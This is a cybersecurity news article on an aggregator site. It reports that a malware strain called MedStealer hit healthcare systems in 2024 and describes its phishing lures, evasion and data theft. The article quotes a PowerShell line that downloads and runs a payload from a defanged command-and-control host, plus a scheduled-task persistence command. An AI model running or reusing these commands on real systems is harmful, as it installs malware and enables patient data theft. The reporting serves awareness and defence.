Close Menu
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
What's Hot

Grok AI chatbot says it ‘was instructed’ to discuss ‘white genocide’

May 15, 2025

YouTube introduces an interactive product feed for shoppable TV ads

May 15, 2025

Billionaire founder of Luminar replaced as CEO following ethics inquiry

May 15, 2025
Facebook X (Twitter) Instagram
Trending
  • Grok AI chatbot says it ‘was instructed’ to discuss ‘white genocide’
  • YouTube introduces an interactive product feed for shoppable TV ads
  • Billionaire founder of Luminar replaced as CEO following ethics inquiry
  • Harvey reportedly in discussions to raise $250M at $5B valuation
  • US slams brakes on AI Diffusion Rule, hardens chip export curbs
  • Hedra, the app used to make talking baby podcasts, raises $32M from a16z
  • Trump told Tim Cook he doesn’t want Apple building iPhones in India
  • South Korea delays decision on letting Google move hi-res map data overseas
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
Facebook X (Twitter) Instagram
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech InnovationsRoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Thursday, May 15
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Home » Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

GTBy GTMay 15, 2025 Cybersecurity No Comments3 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email


Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

In 2024, the healthcare sector faced an unprecedented wave of cyber attacks, with 276 million patient records exposed globally.

Among the most insidious threats was MedStealer, a malware strain that targeted electronic health records (EHRs), insurance databases, and patient portals.

First observed in early 2024, MedStealer exploited vulnerabilities in legacy healthcare IT systems and third-party vendor networks.


Google News

Attack vectors ranged from phishing campaigns impersonating medical platforms like Zocdoc to SQL injection attacks on unpatched servers.

The malware’s primary objective was to exfiltrate personally identifiable information (PII), insurance details, and medical histories, which were later sold on dark web markets for premiums exceeding $1,000 per record.

Check Point researchers identified MedStealer’s distribution network, which relied heavily on spear-phishing emails disguised as appointment confirmations or prescription notifications.

These emails contained malicious PDF attachments embedded with JavaScript droppers.

Zocdoc Phishing Email Template (Source – Check Point)

Once opened, the script initiated a PowerShell command to download the malware payload from a command-and-control (C2) server.

The campaign’s success stemmed from its use of geofencing-targeting users based in the U.S.-and leveraging compromised healthcare employee credentials to bypass email filters.

The fallout was catastrophic: stolen data fueled insurance fraud, illicit prescription drug sales, and even life-threatening medical errors when EHRs were altered.

Hospitals reported delays in treatments due to system lockdowns, while patients faced identity theft lawsuits and extortion attempts.

Infection Mechanism: Blending Social Engineering with Obfuscated Code

MedStealer’s infection chain combined psychological manipulation with advanced technical evasion. A typical attack began with a phishing email titled “Your Appointment is Ready!”, which included a fake medical ID and urgency to act.

The attached PDF used a Base64-encoded URL to fetch the payload:-

$payloadUrl = “hxxps://healthportal[.]care/update.php?ID=ZXhhbXBsZS1iYWQN”;
Invoke-WebRequest -Uri $payloadUrl -OutFile $env:Temp\med_update.exe; Start-Process $env:Temp\med_update.exe

The malware employed process hollowing to inject itself into legitimate Windows utilities like svchost.exe, evading endpoint detection.

Check Point analysts noted that MedStealer’s authors used DNS tunneling to exfiltrate data, disguising stolen records as benign HTTPS traffic.

For persistence, the malware created a scheduled task named “HealthMonitor”:-

schtasks /create /tn “HealthMonitor” /tr “C:\Windows\System32\med_update.exe” /sc hourly /mo 12

Notably, MedStealer exploited vulnerabilities in DICOM protocols (used for medical imaging), allowing lateral movement within hospital networks.

Attackers leveraged misconfigureded PACS (Picture Archiving and Communication Systems) to deploy ransomware alongside data theft tools.

The surge in healthcare breaches underscores the need for zero-trust architectures and AI-driven anomaly detection.

Check Point’s Harmony Email & Collaboration suite blocked over 7,000 MedStealer-linked phishing attempts in 2024, highlighting the critical role of adaptive email security.

As cyber criminals refine their tactics, healthcare organizations must prioritize patch management, employee training, and multi-layered threat prevention to safeguard sensitive patient data.

How SOC Teams Save Time and Effort with ANY.RUN – Live webinar for SOC teams and managers



Source link

GT
  • Website

Keep Reading

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments

China Reportedly Admits Their Role in Cyber Attacks Against U.S. Infrastructure

APT32 Hackers Weaponizing GitHub to Attack Cybersecurity Professionals & Enterprises

10 Best IT Asset Management Tools

Daisy Cloud Hacker Group Exposed 30K Login Credentials Across a Wide Range of Services

Add A Comment
Leave A Reply Cancel Reply

Editors Picks

Grok AI chatbot says it ‘was instructed’ to discuss ‘white genocide’

May 15, 2025

Trump told Tim Cook he doesn’t want Apple building iPhones in India

May 15, 2025

Alibaba earnings report fiscal Q4 2025

May 15, 2025

Tencent bets on WeChat empire to get ahead in China AI race

May 15, 2025
Latest Posts

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

May 15, 2025

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

May 6, 2025

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments

May 1, 2025

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Welcome to RoboNewsWire, your trusted source for cutting-edge news and insights in the world of technology. We are dedicated to providing timely and accurate information on the most important trends shaping the future across multiple sectors. Our mission is to keep you informed and ahead of the curve with deep dives, expert analysis, and the latest updates in key industries that are transforming the world.

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
© 2025 Robonewswire. Designed by robonewswire.

Type above and press Enter to search. Press Esc to cancel.

STEAM Education

At FutureBots, we believe the future belongs to creators, thinkers, and problem-solvers. That’s why we’ve made it our mission to provide high-quality STEM products designed to inspire curiosity, spark innovation, and empower learners of all ages to shape the world through robotics and technology.